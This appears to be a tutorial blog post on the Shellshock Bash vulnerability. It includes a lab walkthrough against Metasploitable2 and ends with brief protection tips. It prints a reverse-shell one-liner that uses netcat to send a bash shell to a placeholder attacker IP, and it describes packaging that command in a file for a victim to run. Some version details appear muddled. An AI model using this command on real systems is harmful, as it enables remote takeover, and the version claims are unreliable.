Exploiting the Shellshock Vulnerability and Protecting Yourself against It

Shellshock is a security vulnerability that was discovered in 2014, and it allows an attacker to execute arbitrary shell commands on a computer system. This vulnerability primarily affects the Bash (Bourne Again SHell) shell, which is commonly found in Linux and Unix-like operating systems. Shellshock arose due to a flaw in the way Bash processes environment variables.

The Shellshock vulnerability is exploited through environment variables and also becomes particularly dangerous when used through CGI (Common Gateway Interface) scripts and other web application components.

The potential consequences of the Shellshock vulnerability include:

1. Remote Code Execution: Attackers can execute commands remotely on an affected system and gain control over it.
2. Access to Sensitive Data: Attackers can access sensitive data on the compromised system.
3. System Damage: Attackers can cause damage to the system and disrupt services.

To understand the Shellshock vulnerability, it is necessary to understand some basic terms first,

Users input commands and command scripts through the shell. The shell processes these commands and, in turn, passes them to the kernel, allowing the kernel to manage hardware and system resources. The kernel interacts with the hardware, performs necessary operations, and returns results to the shell for users to see. These three components are interconnected and work together to form the Linux operating system.

The vulnerability in this bash shell gives us the ability to arbitrary code execution through environment variables. So what are the types of shells?

1. Bash (Bourne Again Shell): Bash is the most commonly used shell in Unix-like operating systems, providing a user-friendly command-line interface.
2. Ksh (Korn Shell): Ksh is an enhanced version of the Bourne shell, offering rich features for workflow automation.
3. Csh (C Shell): Csh is designed for C programmers and allows you to write commands in a C-like language.
4. Tcsh (TENEX C Shell): Tcsh is an improved version of Csh, known for user-friendly command-line editing enhancements.
5. Zsh (Z Shell): Zsh offers advanced auto-completion features for users and is highly customizable.

The Shellshock vulnerability primarily affected specific versions of the Bash (Bourne Again Shell). Here are the Bash versions that were affected by the Shellshock vulnerability and subsequently fixed:

1. Bash 1.14 through 4.3: Bash versions within this range were susceptible to the Shellshock vulnerability.
2. Bash 4.3.1: This version was where the Shellshock vulnerability was discovered and promptly patched.
3. Bash 4.3.25: The Shellshock vulnerability was fully addressed and resolved in this version.

Let’s talk about environment variables.

In Linux operating systems, there are many environment variables that store important information about the system and user environment. These variables can be utilized by scripts, applications, and the system itself.

Now let’s see how we can execute arbitrary code using environment variables

Let’s exploit bash a bit.

Requirements:

->Victim Host(Metasploitable2)-optional
->Attacker Host(Kali or ParrotOS)

First let’s find out what our bash version is

Yes! As we can see, this version is one of the vulnerable versions mentioned above.

env t='() { :; };nc <Attacker IP> <Port> -e /bin/bash' bash -c 'echo hello'

1. env t='() { :; };nc <Attacker IP> <Port>-e /bin/bash': This section defines an environment variable t and shows a malicious Bash script containing NetCat. This command takes advantage of the Shellshock vulnerability to open a connection.
2. bash -c 'echo hello': This section runs the Bash shell on the target system and simply echoes the text “hello” to the screen. While this looks like a harmless command, the real intention is to use it to execute malicious commands or code on the target system.

In parallel, we started a listener on the Attacker Host via NetCat.

After executing our code on Victim Host, when we return to kali, we see that we can have the shell and we confirm this with some commands.

Now let’s not leave this code like this, let’s turn it into a file.

Then let’s make this file executable. Then we will see that we can get the shell when the file is executed by the victim.

How can we protect our environments against ShellShock vulnerability?

• Update Bash: The most critical step is to ensure that your Bash installation is up to date.
• Use Alternative Shells: Consider using alternative shells like Zsh, Fish, or Dash in place of Bash if possible.
• Network Segmentation: Implement network segmentation to limit access to critical systems

Stay Tuned for my other articles.